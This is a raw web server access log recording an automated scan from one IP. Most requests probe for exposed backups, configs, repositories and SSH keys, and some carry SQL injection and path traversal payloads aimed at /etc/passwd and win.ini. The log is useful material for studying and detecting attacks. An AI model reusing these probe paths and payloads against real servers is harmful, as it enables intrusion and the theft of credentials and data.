205.185.122.202 - - [19/Oct/2025:20:52:27 +0530] "GET /a.zip HTTP/1.1" 404 1004
205.185.122.202 - - [19/Oct/2025:20:52:27 +0530] "GET /nvcgstnczt HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:27 +0530] "GET /index.php?q=file:///C:/Windows/win.ini HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:52:27 +0530] "GET /a.tar.gz HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:20:52:27 +0530] "GET /core HTTP/1.1" 404 1002
205.185.122.202 - - [19/Oct/2025:20:52:27 +0530] "GET /a.rar HTTP/1.1" 404 1004
205.185.122.202 - - [19/Oct/2025:20:52:28 +0530] "GET /gnzwgtycng HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:28 +0530] "POST /apply.cgi HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:52:28 +0530] "GET /a.7z HTTP/1.1" 404 1002
205.185.122.202 - - [19/Oct/2025:20:52:28 +0530] "GET /WEB-INF/web.xml HTTP/1.1" 404 992
205.185.122.202 - - [19/Oct/2025:20:52:28 +0530] "GET /a.gz HTTP/1.1" 404 1002
205.185.122.202 - - [19/Oct/2025:20:52:28 +0530] "GET /a.tgz HTTP/1.1" 404 1004
205.185.122.202 - - [19/Oct/2025:20:52:29 +0530] "GET /a.tar.bz2 HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:52:29 +0530] "GET /1.zip HTTP/1.1" 404 1004
205.185.122.202 - - [19/Oct/2025:20:52:29 +0530] "GET /cgi-bin/export-cgi?category=config&arg0=startup-config.conf HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:20:52:29 +0530] "GET /1.tar.gz HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:20:52:29 +0530] "GET /vttamewute HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:30 +0530] "GET /1.rar HTTP/1.1" 404 1004
205.185.122.202 - - [19/Oct/2025:20:52:30 +0530] "GET /composer.json HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:20:52:30 +0530] "GET /System/Info/Public HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:20:52:30 +0530] "GET /1.7z HTTP/1.1" 404 1002
205.185.122.202 - - [19/Oct/2025:20:52:30 +0530] "GET /composer.lock HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:20:52:30 +0530] "GET /ghrnxhfgpi HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:30 +0530] "GET /1.gz HTTP/1.1" 404 1002
205.185.122.202 - - [19/Oct/2025:20:52:30 +0530] "GET /crossdomain.xml HTTP/1.1" 404 1024
205.185.122.202 - - [19/Oct/2025:20:52:30 +0530] "GET /dvgamiyvdp HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:30 +0530] "GET /1.tgz HTTP/1.1" 404 1004
205.185.122.202 - - [19/Oct/2025:20:52:31 +0530] "GET /requirements.txt HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:20:52:31 +0530] "GET /1.tar.bz2 HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:52:31 +0530] "GET /old.zip HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:20:52:31 +0530] "GET /old.tar.gz HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:32 +0530] "GET /old.rar HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:20:52:32 +0530] "GET /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd HTTP/1.1" 404 1222
205.185.122.202 - - [19/Oct/2025:20:52:32 +0530] "GET /yduhgocwno HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:32 +0530] "GET /old.7z HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:20:52:32 +0530] "POST /E-mobile/App/Ajax/ajax.php?action=mobile_upload_save HTTP/1.1" 404 1046
205.185.122.202 - - [19/Oct/2025:20:52:32 +0530] "GET /cacti/ HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:20:52:32 +0530] "GET /old.gz HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:20:52:33 +0530] "GET /umquwbzoxw HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:33 +0530] "GET /old.tgz HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:20:52:33 +0530] "GET /nohup.out HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:52:33 +0530] "GET /old.tar.bz2 HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:20:52:33 +0530] "GET /index.zip HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:52:33 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:20:52:33 +0530] "GET /xuwevwgqpg HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:34 +0530] "GET /index.tar.gz HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:52:34 +0530] "GET /memadmin/index.php HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:20:52:34 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:20:52:34 +0530] "GET /index.rar HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:52:34 +0530] "GET /cyvaszkhux HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:34 +0530] "GET /index.7z HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:20:52:34 +0530] "GET /httpd.conf HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:34 +0530] "GET /index.gz HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:20:52:35 +0530] "GET /index.tgz HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:52:35 +0530] "GET /ewmmqsumum HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:35 +0530] "GET /index.tar.bz2 HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:20:52:35 +0530] "GET /web.config HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:35 +0530] "GET /sql.zip HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:20:52:35 +0530] "GET /index.php?user/login HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:52:36 +0530] "GET /vmeetivtsb HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:36 +0530] "GET /sql.tar.gz HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:36 +0530] "GET /zabbix.php?action=dashboard.view&dashboardid=1 HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:36 +0530] "GET /phpmyadmin/index.php HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:20:52:36 +0530] "GET /sql.rar HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:20:52:36 +0530] "GET /fvllinxgas HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:36 +0530] "GET /_phpmyadmin/index.php HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:20:52:36 +0530] "GET /zabbix/zabbix.php?action=dashboard.view&dashboardid=1 HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:20:52:36 +0530] "GET /sql.7z HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:20:52:36 +0530] "GET /config.php HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:36 +0530] "GET /ppyqhxscob HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:37 +0530] "GET /phpMyAdmin/index.php HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:20:52:37 +0530] "GET /sql.gz HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:20:52:37 +0530] "GET /config.inc HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:37 +0530] "GET /.git/index HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:37 +0530] "GET /pma/index.php HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:20:52:37 +0530] "GET /sql.tgz HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:20:52:37 +0530] "GET /config/config.php HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:20:52:37 +0530] "GET /mwkiwxbace HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:37 +0530] "GET /sql.tar.bz2 HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:20:52:37 +0530] "GET /config/config.inc HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:20:52:37 +0530] "POST /wxapp.php?controller=Goods.doPageUpload HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:52:38 +0530] "GET /iwhoqhsreo HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:38 +0530] "GET /.git/config HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:20:52:38 +0530] "GET /package.zip HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:20:52:38 +0530] "POST /auth/resetpassword HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:20:52:38 +0530] "GET /.svn/entries HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:52:38 +0530] "GET /fhoqhgwvnv HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:38 +0530] "GET /package.tar.gz HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:20:52:38 +0530] "GET /settings.ini HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:52:38 +0530] "GET /tpmuvyhcyq HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:38 +0530] "GET /package.rar HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:20:52:38 +0530] "GET /application.ini HTTP/1.1" 404 1024
205.185.122.202 - - [19/Oct/2025:20:52:38 +0530] "GET /.htaccess HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:52:39 +0530] "GET /package.7z HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:39 +0530] "GET /yssxyymthr HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:39 +0530] "GET /conf.ini HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:20:52:39 +0530] "GET /.htaccess.bak HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:20:52:39 +0530] "GET /package.gz HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:39 +0530] "GET /api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd HTTP/1.1" 404 1038
205.185.122.202 - - [19/Oct/2025:20:52:39 +0530] "GET /.git/HEAD HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:52:39 +0530] "GET /app.ini HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:20:52:39 +0530] "GET /package.tgz HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:20:52:39 +0530] "POST /api/auth/login HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:20:52:39 +0530] "GET /configs/application.ini HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:20:52:39 +0530] "GET /qskgnciysc HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:39 +0530] "GET /package.tar.bz2 HTTP/1.1" 404 1024
205.185.122.202 - - [19/Oct/2025:20:52:40 +0530] "GET /configuration.ini HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:20:52:40 +0530] "GET /epuadapspr HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:40 +0530] "GET /source/ HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:20:52:40 +0530] "GET /website.zip HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:20:52:40 +0530] "GET /config/config.ini HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:20:52:40 +0530] "GET /.htpasswd HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:52:40 +0530] "GET /website.tar.gz HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:20:52:40 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:20:52:40 +0530] "GET /config.ini HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:40 +0530] "GET /.htpasswd.bak HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:20:52:40 +0530] "GET /fakaogpsbs HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:40 +0530] "GET /conf/config.ini HTTP/1.1" 404 1024
205.185.122.202 - - [19/Oct/2025:20:52:41 +0530] "GET /htpasswd.bak HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:52:41 +0530] "GET /website.rar HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:20:52:41 +0530] "GET /readme.md HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:52:41 +0530] "GET /self.key HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:20:52:41 +0530] "GET /application/configs/application.ini HTTP/1.1" 404 1064
205.185.122.202 - - [19/Oct/2025:20:52:41 +0530] "GET /website.7z HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:41 +0530] "GET /readme.txt HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:41 +0530] "GET /ihleohbacg HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:41 +0530] "GET /php.ini HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:20:52:41 +0530] "GET /website.gz HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:41 +0530] "GET /readme HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:20:52:41 +0530] "GET /code.tar.gz HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:20:52:41 +0530] "GET /.user.ini HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:52:41 +0530] "GET /website.tgz HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:20:52:41 +0530] "GET /README.md HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:52:41 +0530] "GET /src.tar.gz HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:42 +0530] "GET /db.ini HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:20:52:42 +0530] "GET /website.tar.bz2 HTTP/1.1" 404 1024
205.185.122.202 - - [19/Oct/2025:20:52:42 +0530] "GET /README.txt HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:42 +0530] "GET /htdocs.tar.gz HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:20:52:42 +0530] "GET /config/list HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:20:52:42 +0530] "GET /luqylwaxey HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:42 +0530] "GET /upload.zip HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:42 +0530] "GET /webserver.tar.gz HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:20:52:42 +0530] "GET /README HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:20:52:42 +0530] "GET /pwcxwmywkm HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:42 +0530] "GET /data.txt HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:20:52:42 +0530] "GET /upload.tar.gz HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:20:52:42 +0530] "GET /tools.tar.gz HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:52:43 +0530] "GET /LICENSE.md HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:43 +0530] "GET /?a=display&templateFile=README.md HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:20:52:43 +0530] "GET /upload.rar HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:43 +0530] "GET /.env HTTP/1.1" 404 1002
205.185.122.202 - - [19/Oct/2025:20:52:43 +0530] "GET /zqyrivgmbb HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:43 +0530] "GET /LICENSE.txt HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:20:52:43 +0530] "GET /webroot.zip HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:20:52:43 +0530] "GET /upload.7z HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:52:43 +0530] "GET /app.cfg HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:20:52:43 +0530] "GET /.vimrc HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:20:52:43 +0530] "GET /site.tar.gz HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:20:52:43 +0530] "GET /upload.gz HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:52:43 +0530] "GET /qrgfpwvvga HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:43 +0530] "GET /install.tar.gz HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:20:52:44 +0530] "GET /upload.tgz HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:44 +0530] "GET /module/smartblog/archive?month=1&year=1&day=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,(SELECT%20MD5(1491)),NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20- HTTP/1.1" 404 1042
205.185.122.202 - - [19/Oct/2025:20:52:44 +0530] "GET /.ssh/known_hosts HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:20:52:44 +0530] "GET /kznwffwgcz HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:44 +0530] "GET /build.tar.gz HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:52:44 +0530] "GET /upload.tar.bz2 HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:20:52:44 +0530] "GET /server.cfg HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:44 +0530] "GET /qceqbrkvrx HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:44 +0530] "GET /deploy.tar.gz HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:20:52:44 +0530] "GET /live_mfg.shtml HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:20:52:44 +0530] "GET /admin.zip HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:52:44 +0530] "GET /qdduqdpdei HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:44 +0530] "GET /install.sh HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:44 +0530] "GET /admin.tar.gz HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:52:45 +0530] "GET /backup/ HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:20:52:45 +0530] "GET /deploy.sh HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:52:45 +0530] "GET /admin.rar HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:52:45 +0530] "GET /upload.sh HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:52:45 +0530] "GET /admin.7z HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:20:52:45 +0530] "GET /LICENSE HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:20:52:45 +0530] "GET /setup.sh HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:20:52:45 +0530] "GET /admin.gz HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:20:52:45 +0530] "GET /backup.sh HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:52:45 +0530] "GET /CHANGELOG.md HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:52:46 +0530] "GET /admin.tgz HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:52:46 +0530] "GET /rsync.sh HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:20:52:46 +0530] "GET /CHANGELOG.txt HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:20:52:46 +0530] "GET /admin.tar.bz2 HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:20:52:46 +0530] "GET /sync.sh HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:20:52:46 +0530] "GET /CHANGELOG HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:52:46 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:20:52:46 +0530] "GET /wwwroot.zip HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:20:52:46 +0530] "GET /pfnlmzlrss HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:47 +0530] "GET /test.sh HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:20:52:47 +0530] "GET /changelog.md HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:52:47 +0530] "GET /wwwroot.tar.gz HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:20:52:47 +0530] "GET /data.sql HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:20:52:47 +0530] "GET /drcxdgwivt HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:47 +0530] "GET /zabbix/setup.php HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:20:52:47 +0530] "GET /run.sh HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:20:52:47 +0530] "GET /changelog.txt HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:20:52:47 +0530] "GET /wwwroot.rar HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:20:52:47 +0530] "GET /database.sql HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:52:47 +0530] "GET /solr/ HTTP/1.1" 404 1004
205.185.122.202 - - [19/Oct/2025:20:52:47 +0530] "GET /setup.php HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:52:47 +0530] "GET /changelog HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:52:47 +0530] "GET /wwwroot.7z HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:47 +0530] "GET /db.sql HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:20:52:47 +0530] "GET /CONTRIBUTING.md HTTP/1.1" 404 1024
205.185.122.202 - - [19/Oct/2025:20:52:48 +0530] "GET /wwwroot.gz HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:48 +0530] "GET /test.sql HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:20:52:48 +0530] "GET /CONTRIBUTING.txt HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:20:52:48 +0530] "GET /wwwroot.tgz HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:20:52:48 +0530] "GET /admin.sql HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:52:48 +0530] "GET /wwwroot.tar.bz2 HTTP/1.1" 404 1024
205.185.122.202 - - [19/Oct/2025:20:52:48 +0530] "GET /backup.sql HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:48 +0530] "GET /CONTRIBUTING HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:52:48 +0530] "GET /www.zip HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:20:52:48 +0530] "GET /dump.sql HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:20:52:49 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:20:52:49 +0530] "GET /install.md HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:49 +0530] "GET /www.tar.gz HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:49 +0530] "GET /create.sql HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:49 +0530] "GET /install.txt HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:20:52:49 +0530] "GET /www.rar HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:20:52:49 +0530] "GET /mainpage/msglog.aspx?user=1%27%20and%201=convert(int,(select%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27120935%27))))-- HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:20:52:49 +0530] "GET /install HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:20:52:49 +0530] "GET /www.7z HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:20:52:49 +0530] "GET /install.php.md HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:20:52:50 +0530] "GET /www.gz HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:20:52:50 +0530] "GET /xbltmzvenn HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:50 +0530] "GET /install.php.txt HTTP/1.1" 404 1024
205.185.122.202 - - [19/Oct/2025:20:52:50 +0530] "GET /www.tgz HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:20:52:50 +0530] "GET /.ssh/id_rsa.pub HTTP/1.1" 404 1024
205.185.122.202 - - [19/Oct/2025:20:52:50 +0530] "GET /pbovozplth HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:50 +0530] "GET /install.php HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:20:52:50 +0530] "GET /www.tar.bz2 HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:20:52:50 +0530] "GET /.ssh/id_rsa HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:20:52:50 +0530] "GET /.ssh/id_dsa.pub HTTP/1.1" 404 1024
205.185.122.202 - - [19/Oct/2025:20:52:50 +0530] "GET /fzvlbxuqxt HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:51 +0530] "GET /INSTALL.md HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:51 +0530] "GET /.ssh/id_dsa HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:20:52:51 +0530] "GET /web.zip HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:20:52:51 +0530] "GET /103.10.134.234.sql HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:20:52:51 +0530] "GET /id_rsa.pub HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:51 +0530] "GET /INSTALL.txt HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:20:52:51 +0530] "GET /id_dsa HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:20:52:51 +0530] "GET /web.tar.gz HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:51 +0530] "GET /secure/ManageFilters.jspa?filter=popular&filterView=popular HTTP/1.1" 404 1044
205.185.122.202 - - [19/Oct/2025:20:52:51 +0530] "GET /.ssh/authorized_keys HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:20:52:51 +0530] "GET /INSTALL HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:20:52:51 +0530] "GET /id_rsa HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:20:52:51 +0530] "GET /web.rar HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:20:52:51 +0530] "GET /MAINTAINERS.md HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:20:52:51 +0530] "GET /index.php?m=Goods&a=showcate&id=103%20UNION%20ALL%20SELECT%20CONCAT%28md5(209046434)%29%23 HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:52:51 +0530] "GET /web.7z HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:20:52:51 +0530] "GET /cicblpeplp HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:52 +0530] "GET /MAINTAINERS.txt HTTP/1.1" 404 1024
205.185.122.202 - - [19/Oct/2025:20:52:52 +0530] "GET /web.gz HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:20:52:52 +0530] "GET /index.php~ HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:52 +0530] "GET /MAINTAINERS HTTP/1.1" 404 1016
